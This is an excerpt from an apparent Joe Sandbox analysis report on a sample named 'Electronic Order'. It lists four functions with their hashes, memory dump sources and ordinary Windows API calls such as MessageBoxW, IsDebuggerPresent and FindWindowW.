                                      • Opcode ID: 5ca69b129076c78a623b29dbc88eab86e6a5848024c4e9cd5e26956856ec3e3e
                                      • Instruction ID: 6f191b7bd9a9f243929d4286b45cc11a88ae690e0390a530f818098d62083d28
                                      • Opcode Fuzzy Hash: 5ca69b129076c78a623b29dbc88eab86e6a5848024c4e9cd5e26956856ec3e3e
                                      • Instruction Fuzzy Hash: BCF04F71308656DFE724EB6BBE016612795EB60770F544466E108EA2E0EB30C88597B0
                                      Function 00E251CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClassName_wcscmp
                                      • String ID: #32770
                                      • API String ID: 2292705959-463685578
                                      • Opcode ID: 081f9f1ce70df5ab27c088b6d0f33b00d80d396992b4f33f94f9b112fc692382
                                      • Instruction ID: f6bdb19fdcd5eae2fc62302172254e3f92bae0ff02e07460ad9cbf3ef756e43e
                                      • Opcode Fuzzy Hash: 081f9f1ce70df5ab27c088b6d0f33b00d80d396992b4f33f94f9b112fc692382
                                      • Instruction Fuzzy Hash: 53E02B335003285BD710A696AC09AA7F7ACEB41721F000067F914E3050E560990587E0
                                      Function 00E181BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E181CA
                                        • Part of subcall function 00DE3598: _doexit.LIBCMT ref: 00DE35A2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Message_doexit
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 1993061046-4017498283
                                      • Opcode ID: 08a3b801d799fcaaf0e925a5e098b2085ed094188836043a82eb57e3ff573dac
                                      • Instruction ID: da8e00a4552e6bbf777557fc4ce9b456eb1dd3400f215b26d93e32e922072272
                                      • Opcode Fuzzy Hash: 08a3b801d799fcaaf0e925a5e098b2085ed094188836043a82eb57e3ff573dac
                                      • Instruction Fuzzy Hash: 8BD02B323C135832D21433A52C0BFC576488F05F12F004415FB0C765C38DD288C242F8
                                      Function 00DFB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DFB564: _memset.LIBCMT ref: 00DFB571
                                        • Part of subcall function 00DE0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00DFB540,?,?,?,00DC100A), ref: 00DE0B89
                                      • IsDebuggerPresent.KERNEL32(?,?,?,00DC100A), ref: 00DFB544
                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00DC100A), ref: 00DFB553
                                      Strings
                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00DFB54E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                      • API String ID: 3158253471-631824599
                                      • Opcode ID: ea1aca5282a6ebaa76f6afcf47d87293629786cc8c0e1a866a6c1fceb51cb254
                                      • Instruction ID: 91acb339aa7a14a59259b06db80d2338a4f8aa77f4cecc2f7532ca0a877590cd
                                      • Opcode Fuzzy Hash: ea1aca5282a6ebaa76f6afcf47d87293629786cc8c0e1a866a6c1fceb51cb254
                                      • Instruction Fuzzy Hash: F2E06D742007158FD721DF2AE4087527BE0EB00B68F05C92EE546D7360DBB9D448CB71
                                      Function 00E45BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E45BF5
                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E45C08
                                        • Part of subcall function 00E254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E2555E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: 07373ab2a0553efb5607f401fc0c5c65eb04595ebb3dbedd72c53125a1a9789b
                                      • Instruction ID: a5e3d49ebacfa9590af024cd71dd0160ad0af3a70c5d915550d742a975b151ee
                                      • Opcode Fuzzy Hash: 07373ab2a0553efb5607f401fc0c5c65eb04595ebb3dbedd72c53125a1a9789b
                                      • Instruction Fuzzy Hash: D3D0A936388310BAE334BB30AC0BF976A10AB01B00F010834B20ABA0D0C8E45801C240